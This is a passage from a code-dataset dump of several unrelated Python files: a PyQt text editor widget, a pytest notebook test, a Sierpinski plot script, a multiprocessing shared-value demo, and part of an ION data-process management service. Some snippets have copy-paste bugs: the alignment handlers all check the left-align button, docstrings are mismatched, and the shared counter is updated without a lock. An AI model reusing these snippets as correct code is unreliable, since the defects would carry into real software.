\"\"\"\n fmt = QTextCharFormat()\n if self.btn_subscript.isChecked():\n fmt.setVerticalAlignment(QTextCharFormat.AlignSubScript)\n else:\n fmt.setVerticalAlignment(QTextCharFormat.AlignNormal)\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_align_left(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignLeft)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_align_right(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignRight)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_align_center(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignCenter)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_align_justify(self):\n \"\"\" Set text format to bold. \"\"\"\n if self.btn_left.isChecked():\n self.txt_body.setAlignment(Qt.AlignJustify)\n else:\n self.txt_body.setAlignment(Qt.AlignLeft)\n self.update_button()\n\n def format_list(self, action):\n \"\"\" set list format according to selected format\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n\n # Create a new list\n if not (action == self.act_increase_indent or action == self.act_decrease_indent or action == self.act_no_list):\n # Set the list type format\n fmt = QTextListFormat()\n if action == self.act_bullet_list:\n fmt.setStyle(QTextListFormat.ListDisc)\n elif action == self.act_numbered_list:\n fmt.setStyle(QTextListFormat.ListDecimal)\n elif action == self.act_roman_list:\n fmt.setStyle(QTextListFormat.ListUpperRoman)\n elif action == self.act_uppercase_list:\n fmt.setStyle(QTextListFormat.ListUpperAlpha)\n else:\n fmt.setStyle(QTextListFormat.ListLowerAlpha)\n\n # Add the list to the the text edit\n cursor = self.txt_body.textCursor()\n cursor.createList(fmt)\n # Delete an existing list\n elif action == self.act_no_list:\n # Get the current list\n cursor = self.txt_body.textCursor()\n current_list = cursor.currentList()\n current_block = cursor.block()\n\n # Remove the list\n current_list.remove(current_block)\n\n # Restore indent\n fmt = cursor.blockFormat()\n fmt.setIndent(0)\n cursor.setBlockFormat(fmt)\n # Change the indent\n else:\n cursor = self.txt_body.textCursor()\n current_format = cursor.currentList().format()\n current_indent = current_format.indent()\n\n if action == self.act_increase_indent:\n new_indent = current_indent + 1\n else:\n new_indent = current_indent - 1\n\n new_format = current_format\n new_format.setIndent(new_indent)\n cursor.createList(new_format)\n\n def format_text_color(self, action):\n \"\"\" Set the text color\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n if action == self.act_gray_text:\n text_color = QColor(117, 117, 117)\n elif action == self.act_red_text:\n text_color = QColor(150, 16, 16)\n elif action == self.act_orange_text:\n text_color = QColor(211, 116, 0)\n elif action == self.act_yellow_text:\n text_color = QColor(229, 221, 0)\n elif action == self.act_green_text:\n text_color = QColor(34, 139, 34)\n elif action == self.act_blue_text:\n text_color = QColor(18, 18, 130)\n elif action == self.act_purple_text:\n text_color = QColor(117, 21, 117)\n else:\n text_color = Qt.black\n\n fmt = QTextCharFormat()\n fmt.setForeground(QBrush(text_color))\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def 
format_highlight(self, action):\n \"\"\" Set the highlight color\n\n .. note::\n The highlight color alpha channel is set to 128 so the color are semi-transparent. This prevent the colors\n to be too harsh.\n\n :param action: Selected action.\n :type action: QAction\n \"\"\"\n fmt = QTextCharFormat()\n\n # Set the selected color to background\n if not action == self.act_clear_highlight:\n if action == self.act_red_highlight:\n highlight_color = QColor(242, 41, 74, 128)\n elif action == self.act_orange_highlight:\n highlight_color = QColor(252, 116, 42, 128)\n elif action == self.act_yellow_highlight:\n highlight_color = QColor(255, 251, 45, 128)\n elif action == self.act_green_highlight:\n highlight_color = QColor(0, 250, 154, 128)\n elif action == self.act_blue_highlight:\n highlight_color = QColor(49, 170, 226, 128)\n elif action == self.act_purple_highlight:\n highlight_color = QColor(155, 71, 229, 128)\n else:\n highlight_color = QColor(196, 196, 196, 128)\n\n fmt.setBackground(QBrush(highlight_color))\n # Remove the background\n else:\n fmt.setBackground(QBrush(Qt.white))\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def format_style(self, action):\n \"\"\" Set a predefined format on the selected text\n\n :param action: Selected action (format).\n :type action: QAction\n \"\"\"\n fmt = QTextCharFormat()\n\n # Define the format according to the selected style\n if action == self.act_part:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(20)\n elif action == self.act_section:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(16)\n elif action == self.act_subsection:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(14)\n elif action == self.act_subsubsection:\n fmt.setFontWeight(75)\n fmt.setFontPointSize(13)\n elif action == self.act_body:\n fmt.setFontWeight(50)\n fmt.setFontPointSize(13)\n elif action == self.act_note:\n fmt.setFontWeight(50)\n fmt.setFontPointSize(10)\n\n # Define the format common to every style\n fmt.setForeground(QBrush(Qt.black))\n fmt.setBackground(QBrush(Qt.white))\n fmt.setFontItalic(False)\n fmt.setFontUnderline(False)\n fmt.setFontStrikeOut(False)\n fmt.setVerticalAlignment(QTextCharFormat.AlignNormal)\n\n self.merge_format_on_word_or_selection(fmt=fmt)\n\n def update_button(self):\n \"\"\" Set the button states to match the selected text format \"\"\"\n\n # Get text format\n cfmt = self.txt_body.textCursor().charFormat()\n\n # Bold button\n if cfmt.fontWeight() == 75:\n self.btn_bold.setChecked(True)\n else:\n self.btn_bold.setChecked(False)\n\n # Italic button\n if cfmt.fontItalic():\n self.btn_italic.setChecked(True)\n else:\n self.btn_italic.setChecked(False)\n\n # Underline button\n if cfmt.fontUnderline():\n self.btn_underline.setChecked(True)\n else:\n self.btn_underline.setChecked(False)\n\n # Strikethrough button\n if cfmt.fontStrikeOut():\n self.btn_strikethrough.setChecked(True)\n else:\n self.btn_strikethrough.setChecked(False)\n\n # Superscript button\n if cfmt.verticalAlignment() == QTextCharFormat.AlignSuperScript:\n self.btn_superscript.setChecked(True)\n else:\n self.btn_superscript.setChecked(False)\n\n # Subscript button\n if cfmt.verticalAlignment() == QTextCharFormat.AlignSubScript:\n self.btn_subscript.setChecked(True)\n else:\n self.btn_subscript.setChecked(False)\n\n # Get color format\n # Background color\n background_color = cfmt.background().color()\n if background_color.rgb() == common.HIGHLIGHT_COLOR['red'].color.rgb():\n self.change_highlight_button_icon(self.act_red_highlight)\n elif background_color.rgb() == 
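# One possible alternative (not the original design) to the long if/elif colour
# chains above: keep the action-to-colour mapping in a dict and fall back to a
# default entry.  The colour values below are illustrative.  PyQt5 is assumed.
from PyQt5.QtGui import QColor

TEXT_COLORS = {
    'gray':   QColor(117, 117, 117),
    'red':    QColor(150, 16, 16),
    'orange': QColor(211, 116, 0),
    'green':  QColor(34, 139, 34),
}

def lookup_text_color(name):
    # Unknown names fall back to black, mirroring the final else branch above
    return TEXT_COLORS.get(name, QColor(0, 0, 0))

# Example: lookup_text_color('red').name() -> '#961010'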
common.HIGHLIGHT_COLOR['orange'].color.rgb():\n self.change_highlight_button_icon(self.act_orange_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['yellow'].color.rgb():\n self.change_highlight_button_icon(self.act_yellow_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['green'].color.rgb():\n self.change_highlight_button_icon(self.act_green_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['blue'].color.rgb():\n self.change_highlight_button_icon(self.act_blue_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['purple'].color.rgb():\n self.change_highlight_button_icon(self.act_purple_highlight)\n elif background_color.rgb() == common.HIGHLIGHT_COLOR['gray'].color.rgb():\n self.change_highlight_button_icon(self.act_gray_highlight)\n else:\n self.change_highlight_button_icon(self.act_clear_highlight)\n\n # Text color\n text_color = cfmt.foreground().color()\n\n if text_color == common.TEXT_COLOR['gray'].color:\n self.change_text_color_button_icon(self.act_gray_text)\n elif text_color == common.TEXT_COLOR['red'].color:\n self.change_text_color_button_icon(self.act_red_text)\n elif text_color == common.TEXT_COLOR['orange'].color:\n self.change_text_color_button_icon(self.act_orange_text)\n elif text_color == common.TEXT_COLOR['yellow'].color:\n self.change_text_color_button_icon(self.act_yellow_text)\n elif text_color == common.TEXT_COLOR['gray'].color:\n self.change_text_color_button_icon(self.act_gray_text)\n elif text_color == common.TEXT_COLOR['green'].color:\n self.change_text_color_button_icon(self.act_green_text)\n elif text_color == common.TEXT_COLOR['blue'].color:\n self.change_text_color_button_icon(self.act_blue_text)\n elif text_color == common.TEXT_COLOR['purple'].color:\n self.change_text_color_button_icon(self.act_purple_text)\n else:\n self.change_text_color_button_icon(self.act_black_text)\n\n # Get list format\n if self.txt_body.textCursor().currentList():\n self.btn_list.setChecked(True)\n else:\n self.btn_list.setChecked(False)\n\n if self.txt_body.is_image():\n fmt = self.txt_body.textCursor().charFormat().toImageFormat()\n self.txt_height.setText(\"{:d}\".format(int(fmt.height())))\n self.txt_width.setText(\"{:d}\".format(int(fmt.width())))\n self.width_height_ratio = fmt.width() / fmt.height()\n self.txt_width.setEnabled(True)\n self.txt_height.setEnabled(True)\n else:\n self.txt_width.setEnabled(False)\n self.txt_height.setEnabled(False)\n\n # Get align format\n if self.txt_body.alignment() == Qt.AlignLeft:\n self.btn_left.setChecked(True)\n else:\n self.btn_left.setChecked(False)\n\n if self.txt_body.alignment() == Qt.AlignCenter:\n self.btn_center.setChecked(True)\n else:\n self.btn_center.setChecked(False)\n\n if self.txt_body.alignment() == Qt.AlignRight:\n self.btn_right.setChecked(True)\n else:\n self.btn_right.setChecked(False)\n\n if self.txt_body.alignment() == Qt.AlignJustify:\n self.btn_justify.setChecked(True)\n else:\n self.btn_justify.setChecked(False)\n\n\nclass ProtocolTextEditor(TextEditor):\n def __init__(self, editor_type, tag_list, reference_list):\n super(ProtocolTextEditor, self).__init__(editor_type=editor_type, tag_list=tag_list, reference_list=reference_list)\n self.txt_key.setPlaceholderText(\"Protocol key\")\n self.txt_description.setPlaceholderText(\"Description of the protocol\")\n self.txt_title.setPlaceholderText(\"Untitled protocol\")\n\n\nclass ExperimentTextEditor(TextEditor):\n def __init__(self, tag_list, reference_list, dataset_list, protocol_list, key_list):\n 
super(ExperimentTextEditor, self).__init__(common.TYPE_EXPERIMENT, tag_list=tag_list,\n reference_list=reference_list,\n dataset_list=dataset_list, protocol_list=protocol_list)\n\n completer = QCompleter(key_list)\n self.txt_key.setCompleter(completer)\n\n # Remove the save button\n self.btn_save.deleteLater()\n sip.delete(self.save_layout)\n","sub_path":"labnote/interface/widget/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":64452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487744206","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.11.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# + hide_input=false\n# Setup ipytest extension\ntry:\n ipy_str = str(type(get_ipython()))\n if 'zmqshell' in ipy_str or 'terminal' in ipy_str:\n import ipytest\n ipytest.autoconfig()\nexcept:\n pass\n\n\n# + hide_input=false\n# Import our dependencies\n\nimport os\nimport sys\nfrom pathlib import Path\nimport pytest\nimport pandas\nfrom pandas.testing import assert_frame_equal, assert_series_equal\n\nmodule_path = os.path.abspath('../')\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom derived_variables.paidhb import calculate_paid_housing_benefit\n\ndef get_path(filename):\n return os.path.join(module_path, 'tests/fixtures', filename)\n\n# + [markdown] hide_input=false\n# ## Show function definition\n\n# +\n# calculate_paid_housing_benefit??\n# -\n\n# ## Set up our input data from a CSV fixture\n# This reads in a CSV of values and loads it into memory\n#\n\ninput_data = pandas.read_csv(get_path('input_paidhb.csv'), index_col=0)\ninput_data\n\n# ## Set up our expected result from a CSV fixture\n\nexpected_result = pandas.read_csv(get_path('expected_result_paidhb.csv'), index_col=0, squeeze=True)\nexpected_result\n\n# ## Run the model\n\nactual_result = calculate_paid_housing_benefit(input_data)\nactual_result\n\n# +\n# %%run_pytest[clean]\n\n# Check that our actual result matches our expected result\n\ndef test_apply_weighting():\n assert_frame_equal(actual_result, expected_result)\n\n\n# + hide_input=true\n__name__\n","sub_path":"modules/pandas/tests/test_paidhb.py","file_name":"test_paidhb.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235293715","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n# Functions\ndef triangle(x, y, c):\n plt . 
fill([x, x + c, x + c / 2], [y, y, y + c * np.sqrt(3) / 2], \" b \")\n\n\ndef t2s(n, x, y, c):\n print(\"n:\", n, \" / x:\", x, \" / y:\", y, \" / c:\", c, sep='')\n if n == 0:\n triangle(x, y, c)\n else:\n t2s(n - 1, x, y, c / 2)\n t2s(n - 1, x + c / 2, y, c / 2)\n t2s(n - 1, x + c / 2, y + ((np.sqrt(3) / 2) / 2**n), c / 2)\n print()\n\n\n# Main\n\"\"\"\"triangle(0, 0, 0.5)\ntriangle(0.5, 0, 0.5)\ntriangle(0.25, np.sqrt(3) / 4, 0.5)\"\"\"\n\nn = eval(input(\"Niveau du TdS : \"))\nx = 0\ny = 0\nc = 1\nt2s(n, x, y, c)\n\nplt.show()\n","sub_path":"tp3/tp3ex6.py","file_name":"tp3ex6.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95037375","text":"from multiprocessing import Process, Value\nimport time, random\n\n# 创建共享内存\nmoney = Value('i', 10000)\n\n# 操作共享内存增加\ndef boy():\n for i in range(30):\n time.sleep(0.2)\n # 对value属性操作即对共享内存操作\n money.value += random.randint(1, 1000)\n\ndef girl():\n for i in range(30):\n time.sleep(0.16)\n money.value -= random.randint(100, 900)\n\nb = Process(target=boy)\ng = Process(target=girl)\nb.start()\ng.start()\nb.join()\ng.join()\n\nprint('月余额:', money.value)\n\nmoney.value = 12000\nprint(money.value) # 打印字符串\n","sub_path":"day7/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356031464","text":"#!/usr/bin/env python\n\n\"\"\"\n@package ion.services.sa.process.test.test_int_data_process_management_service\n@author Maurice Manning\n\"\"\"\nfrom uuid import uuid4\n\nfrom pyon.util.log import log\nfrom pyon.util.ion_time import IonTime\nfrom pyon.public import RT, PRED, OT, LCS\nfrom pyon.core.bootstrap import IonObject\nfrom pyon.core.exception import BadRequest, NotFound\nfrom pyon.util.containers import create_unique_identifier\nfrom pyon.util.containers import DotDict\nfrom pyon.util.arg_check import validate_is_not_none, validate_true\nfrom pyon.ion.resource import ExtendedResourceContainer\nfrom interface.objects import ProcessDefinition\n\nfrom interface.services.sa.idata_process_management_service import BaseDataProcessManagementService\nfrom interface.services.sa.idata_product_management_service import DataProductManagementServiceClient\n\nfrom ion.services.sa.instrument.data_process_impl import DataProcessImpl\n\nfrom ion.util.module_uploader import RegisterModulePreparerPy\nimport os\nimport pwd\n\nclass DataProcessManagementService(BaseDataProcessManagementService):\n\n def on_init(self):\n IonObject(\"Resource\") # suppress pyflakes error\n\n self.override_clients(self.clients)\n\n self.init_module_uploader()\n\n self.get_unique_id = (lambda : uuid4().hex)\n\n def init_module_uploader(self):\n if self.CFG:\n #looking for forms like host=amoeba.ucsd.edu, remotepath=/var/www/release, user=steve\n cfg_host = self.CFG.get_safe(\"service.data_process_management.process_release_host\", None)\n cfg_remotepath = self.CFG.get_safe(\"service.data_process_management.process_release_directory\", None)\n cfg_user = self.CFG.get_safe(\"service.data_process_management.process_release_user\",\n pwd.getpwuid(os.getuid())[0])\n cfg_wwwprefix = self.CFG.get_safe(\"service.data_process_management.process_release_wwwprefix\", None)\n\n if cfg_host is None or cfg_remotepath is None or cfg_wwwprefix is None:\n raise BadRequest(\"Missing configuration items; host='%s', directory='%s', wwwprefix='%s'\" %\n (cfg_host, cfg_remotepath, 
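# The multiprocessing.Value example above mutates money.value from two
# processes with "+=", which is a read-modify-write and therefore not atomic.
# A minimal sketch of the usual fix, guarding the update with the Value's
# built-in lock; the names and amounts here are illustrative only.
from multiprocessing import Process, Value

def add_safely(counter, amount):
    with counter.get_lock():        # serialise the read-modify-write
        counter.value += amount

if __name__ == '__main__':
    total = Value('i', 0)
    workers = [Process(target=add_safely, args=(total, 1)) for _ in range(4)]
    for p in workers:
        p.start()
    for p in workers:
        p.join()
    print(total.value)              # 4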
cfg_wwwprefix))\n\n self.module_uploader = RegisterModulePreparerPy(dest_user=cfg_user,\n dest_host=cfg_host,\n dest_path=cfg_remotepath,\n dest_wwwprefix=cfg_wwwprefix)\n\n\n def override_clients(self, new_clients):\n \"\"\"\n Replaces the service clients with a new set of them... and makes sure they go to the right places\n \"\"\"\n\n #shortcut names for the import sub-services\n if hasattr(self.clients, \"resource_registry\"):\n self.RR = self.clients.resource_registry\n\n #farm everything out to the impls\n\n self.data_process = DataProcessImpl(self.clients)\n\n\n #todo: need to know what object will be worked with here\n def register_data_process_definition(self, process_code=''):\n \"\"\"\n register a process module by putting it in a web-accessible location\n\n @process_code a base64-encoded python file\n \"\"\"\n\n# # retrieve the resource\n# data_process_definition_obj = self.clients.resource_registry.read(data_process_definition_id)\n\n dest_filename = \"process_code_%s.py\" % self.get_unique_id() #data_process_definition_obj._id\n\n #process the input file (base64-encoded .py)\n uploader_obj, err = self.module_uploader.prepare(process_code, dest_filename)\n if None is uploader_obj:\n raise BadRequest(\"Process code failed validation: %s\" % err)\n\n # actually upload\n up_success, err = uploader_obj.upload()\n if not up_success:\n raise BadRequest(\"Upload failed: %s\" % err)\n\n# #todo: save module / class?\n# data_process_definition_obj.uri = uploader_obj.get_destination_url()\n# self.clients.resource_registry.update(data_process_definition_obj)\n\n return uploader_obj.get_destination_url()\n\n def create_data_process_definition(self, data_process_definition=None):\n\n result, _ = self.clients.resource_registry.find_resources(RT.DataProcessDefinition, None, data_process_definition.name, True)\n\n validate_true( len(result) ==0, \"A data process definition named '%s' already exists\" % data_process_definition.name)\n\n #todo: determine validation checks for a data process def\n data_process_definition_id, version = self.clients.resource_registry.create(data_process_definition)\n\n #-------------------------------\n # Process Definition\n #-------------------------------\n # Create the underlying process definition\n process_definition = ProcessDefinition()\n process_definition.name = data_process_definition.name\n process_definition.description = data_process_definition.description\n\n process_definition.executable = {'module':data_process_definition.module, 'class':data_process_definition.class_name}\n process_definition_id = self.clients.process_dispatcher.create_process_definition(process_definition=process_definition)\n\n self.clients.resource_registry.create_association(data_process_definition_id, PRED.hasProcessDefinition, process_definition_id)\n\n return data_process_definition_id\n\n def update_data_process_definition(self, data_process_definition=None):\n # TODO: If executable has changed, update underlying ProcessDefinition\n\n # Overwrite DataProcessDefinition object\n self.clients.resource_registry.update(data_process_definition)\n\n def read_data_process_definition(self, data_process_definition_id=''):\n data_proc_def_obj = self.clients.resource_registry.read(data_process_definition_id)\n return data_proc_def_obj\n\n def delete_data_process_definition(self, data_process_definition_id=''):\n\n self.clients.resource_registry.retire(data_process_definition_id)\n\n def force_delete_data_process_definition(self, data_process_definition_id=''):\n\n processdef_ids, _ = 
self.clients.resource_registry.find_objects(subject=data_process_definition_id, predicate=PRED.hasProcessDefinition, object_type=RT.ProcessDefinition, id_only=True)\n self._remove_associations(data_process_definition_id)\n self.clients.resource_registry.delete(data_process_definition_id)\n for processdef_id in processdef_ids:\n self.clients.process_dispatcher.delete_process_definition(processdef_id)\n\n\n def find_data_process_definitions(self, filters=None):\n \"\"\"\n @param filters: dict of parameters to filter down\n the list of possible data proc.\n @retval\n \"\"\"\n #todo: add filtering\n data_process_def_list , _ = self.clients.resource_registry.find_resources(RT.DataProcessDefinition, None, None, True)\n return data_process_def_list\n\n def assign_input_stream_definition_to_data_process_definition(self, stream_definition_id='', data_process_definition_id=''):\n \"\"\"Connect the input stream with a data process definition\n \"\"\"\n # Verify that both ids are valid, RR will throw if not found\n stream_definition_obj = self.clients.resource_registry.read(stream_definition_id)\n data_process_definition_obj = self.clients.resource_registry.read(data_process_definition_id)\n\n validate_is_not_none(stream_definition_obj, \"No stream definition object found for stream definition id: %s\" % stream_definition_id)\n validate_is_not_none(data_process_definition_obj, \"No data process definition object found for data process\" \\\n \" definition id: %s\" % data_process_definition_id)\n\n self.clients.resource_registry.create_association(data_process_definition_id, PRED.hasInputStreamDefinition, stream_definition_id)\n\n def unassign_input_stream_definition_from_data_process_definition(self, stream_definition_id='', data_process_definition_id=''):\n \"\"\"\n Disconnect the Data Product from the Data Producer\n\n @param stream_definition_id str\n @param data_process_definition_id str\n @throws NotFound object with specified id does not exist\n \"\"\"\n\n # Remove the link between the Stream Definition resource and the Data Process Definition resource\n associations = self.clients.resource_registry.find_associations(data_process_definition_id, PRED.hasInputStreamDefinition, stream_definition_id, id_only=True)\n validate_is_not_none(associations, \"No Input Stream Definitions associated with data process definition ID \" + str(data_process_definition_id))\n\n for association in associations:\n self.clients.resource_registry.delete_association(association)\n\n def assign_stream_definition_to_data_process_definition(self, stream_definition_id='', data_process_definition_id='', binding=''):\n \"\"\"Connect the output stream with a data process definition\n \"\"\"\n # Verify that both ids are valid, RR will throw if not found\n stream_definition_obj = self.clients.resource_registry.read(stream_definition_id)\n data_process_definition_obj = self.clients.resource_registry.read(data_process_definition_id)\n\n validate_is_not_none(stream_definition_obj, \"No stream definition object found for stream definition id: %s\" % stream_definition_id)\n validate_is_not_none(data_process_definition_obj, \"No data process definition object found for data process\"\\\n \" definition id: %s\" % data_process_definition_id)\n\n self.clients.resource_registry.create_association(data_process_definition_id, PRED.hasStreamDefinition, stream_definition_id)\n data_process_definition_obj.output_bindings[binding] = stream_definition_id\n self.clients.resource_registry.update(data_process_definition_obj)\n\n def 
unassign_stream_definition_from_data_process_definition(self, stream_definition_id='', data_process_definition_id=''):\n \"\"\"\n Disconnect the Data Product from the Data Producer\n\n @param stream_definition_id str\n @param data_process_definition_id str\n @throws NotFound object with specified id does not exist\n \"\"\"\n\n # Remove the link between the Stream Definition resource and the Data Process Definition resource\n associations = self.clients.resource_registry.find_associations(data_process_definition_id, PRED.hasStreamDefinition, stream_definition_id, id_only=True)\n\n validate_is_not_none(associations, \"No Stream Definitions associated with data process definition ID \" + str(data_process_definition_id))\n for association in associations:\n self.clients.resource_registry.delete_association(association)\n\n\n # ------------------------------------------------------------------------------------------------\n # Working with DataProcess\n\n def create_data_process(self, data_process_definition_id='', in_data_product_ids=None, out_data_products=None, configuration=None):\n \"\"\"\n @param data_process_definition_id: Object with definition of the\n process to apply to the input data product\n @param in_data_product_ids: ID of the input data products\n @param out_data_products: list of IDs of the output data products\n @retval data_process_id: ID of the newly created data process object\n \"\"\"\n\n inform = \"Input Data Product: \"+str(in_data_product_ids)+\\\n \"\\nTransformed by: \"+str(data_process_definition_id)+\\\n \"\\nTo create output Product: \"+str(out_data_products) + \"\\n\"\n log.debug(\"DataProcessManagementService:create_data_process() method called with parameters:\\n\" +\n inform)\n\n #---------------------------------------------------------------------------------------\n # Initialize\n #---------------------------------------------------------------------------------------\n\n configuration = configuration or DotDict()\n\n validate_is_not_none( out_data_products, \"No output data products passed in\")\n\n #---------------------------------------------------------------------------------------\n # Read the data process definition\n #---------------------------------------------------------------------------------------\n data_process_definition = self.read_data_process_definition(data_process_definition_id)\n\n #---------------------------------------------------------------------------------------\n # Read the output bindings from the definition\n #---------------------------------------------------------------------------------------\n\n output_bindings = data_process_definition.output_bindings\n\n #---------------------------------------------------------------------------------------\n # Find the process definition associated with this data process definition.\n # From the process definition, we can get the module and class to run....\n #---------------------------------------------------------------------------------------\n\n procdef_ids,_ = self.clients.resource_registry.find_objects(data_process_definition_id, PRED.hasProcessDefinition, RT.ProcessDefinition, id_only=True)\n if not procdef_ids:\n raise BadRequest(\"Cannot find associated ProcessDefinition for DataProcessDefinition id=%s\" % data_process_definition_id)\n\n process_definition_id = procdef_ids[0]\n\n #---------------------------------------------------------------------------------------\n # Create a data process object and register it\n 
#---------------------------------------------------------------------------------------\n\n # get the name of the data process and create an IONObject for it\n data_process_name = create_unique_identifier(\"process_\" + data_process_definition.name)\n data_process_obj = IonObject(RT.DataProcess, name=data_process_name)\n\n # register the data process\n data_process_id, version = self.clients.resource_registry.create(data_process_obj)\n\n data_process_obj = self.clients.resource_registry.read(data_process_id)\n\n #---------------------------------------------------------------------------------------\n # Make the necessary associations, registering\n #---------------------------------------------------------------------------------------\n\n #todo check if this assoc is needed?\n # Associate the data process with the data process definition\n self.clients.resource_registry.create_association(data_process_id, PRED.hasProcessDefinition, data_process_definition_id)\n\n # Register the data process instance as a data producer with DataAcquisitionMgmtSvc\n data_producer_id = self.clients.data_acquisition_management.register_process(data_process_id)\n log.debug(\"DataProcessManagementService:create_data_process register process \"\n \"with DataAcquisitionMgmtSvc: data_producer_id: %s (L4-CI-SA-RQ-181)\", str(data_producer_id) )\n\n #---------------------------------------------------------------------------------------\n # Register each output data product with DAMS to create DataProducer links\n #---------------------------------------------------------------------------------------\n output_stream_dict = {}\n\n if out_data_products is None:\n raise BadRequest(\"Data Process must have output product(s) specified %s\", str(data_process_definition_id) )\n\n for binding, output_data_product_id in out_data_products.iteritems():\n\n # check that the product is not already associated with a producer\n producer_ids, _ = self.clients.resource_registry.find_objects(output_data_product_id, PRED.hasDataProducer, RT.DataProducer, True)\n if producer_ids:\n raise BadRequest(\"Data Product should not already be associated to a DataProducer %s hasDataProducer %s\", str(data_process_id), str(producer_ids[0]))\n\n #Assign each output Data Product to this producer resource\n output_data_product_obj = self.clients.resource_registry.read(output_data_product_id)\n if not output_data_product_obj:\n raise NotFound(\"Output Data Product %s does not exist\" % output_data_product_id)\n\n # Associate with DataProcess: register as an output product for this process\n log.debug(\"Link data process %s and output out data product: %s (L4-CI-SA-RQ-260)\", str(data_process_id), str(output_data_product_id))\n self.clients.data_acquisition_management.assign_data_product(input_resource_id= data_process_id,data_product_id= output_data_product_id)\n\n # Retrieve the id of the OUTPUT stream from the out Data Product\n stream_ids, _ = self.clients.resource_registry.find_objects(output_data_product_id, PRED.hasStream, RT.Stream, True)\n\n if not stream_ids:\n raise NotFound(\"No Stream created for output Data Product \" + str(output_data_product_id))\n\n if len(stream_ids) != 1:\n raise BadRequest(\"Data Product should only have ONE stream at this time\" + str(output_data_product_id))\n\n output_stream_dict[binding] = stream_ids[0]\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n #Check for attached objects and put them into the 
configuration\n #------------------------------------------------------------------------------------------------------------------------------------------\n\n # check for attachments in data process definition\n configuration = self._find_lookup_tables(data_process_definition_id, configuration)\n input_stream_ids = []\n\n if in_data_product_ids:\n for in_data_product_id in in_data_product_ids:\n\n self.clients.resource_registry.create_association(data_process_id, PRED.hasInputProduct, in_data_product_id)\n log.debug(\"Associate data process workflows with source data products %s \"\n \"hasInputProducts %s (L4-CI-SA-RQ-260)\", str(data_process_id), str(in_data_product_ids))\n\n #check if in data product is attached to an instrument, check instrumentDevice and InstrumentModel for lookup table attachments\n instdevice_ids, _ = self.clients.resource_registry.find_subjects(RT.InstrumentDevice, PRED.hasOutputProduct, in_data_product_id, True)\n\n for instdevice_id in instdevice_ids:\n log.debug(\"Instrument device_id assoc to the input data product of this data process: %s (L4-CI-SA-RQ-231)\", str(instdevice_id))\n\n # check for attachments in instrument device\n configuration = self._find_lookup_tables(instdevice_id, configuration)\n instmodel_ids, _ = self.clients.resource_registry.find_objects(instdevice_id, PRED.hasModel, RT.InstrumentModel, True)\n\n for instmodel_id in instmodel_ids:\n # check for attachments in instrument model\n configuration = self._find_lookup_tables(instmodel_id, configuration)\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # Get the input stream from the input_data_product, which should already be associated with a stream via the Data Producer\n #------------------------------------------------------------------------------------------------------------------------------------------\n input_stream_ids = self._get_input_stream_ids(in_data_product_ids)\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # Create subscription to the input stream\n #------------------------------------------------------------------------------------------------------------------------------------------\n input_subscription_id = self.clients.pubsub_management.create_subscription(name=data_process_name, stream_ids=input_stream_ids)\n\n #------------------------------------------------------------------------------------------------------------------------------------------\n # Add the subscription id to the data process\n #------------------------------------------------------------------------------------------------------------------------------------------\n data_process_obj.input_subscription_id = input_subscription_id\n\n log.info(\"Launching the process\")\n debug_str = \"\\n\\tQueue Name: %s\\n\\tOutput Streams: %s\\n\\tProcess Definition ID: %s\\n\\tConfiguration: %s\" % (data_process_name, output_stream_dict, process_definition_id, configuration)\n log.debug(debug_str)\n\n pid = self._launch_process(\n queue_name=data_process_name,\n out_streams=output_stream_dict,\n process_definition_id=process_definition_id,\n configuration=configuration)\n\n data_process_obj.process_id = pid\n self.clients.resource_registry.update(data_process_obj)\n return data_process_id\n\n def _get_input_stream_ids(self, in_data_product_ids = None):\n\n input_stream_ids = []\n\n 
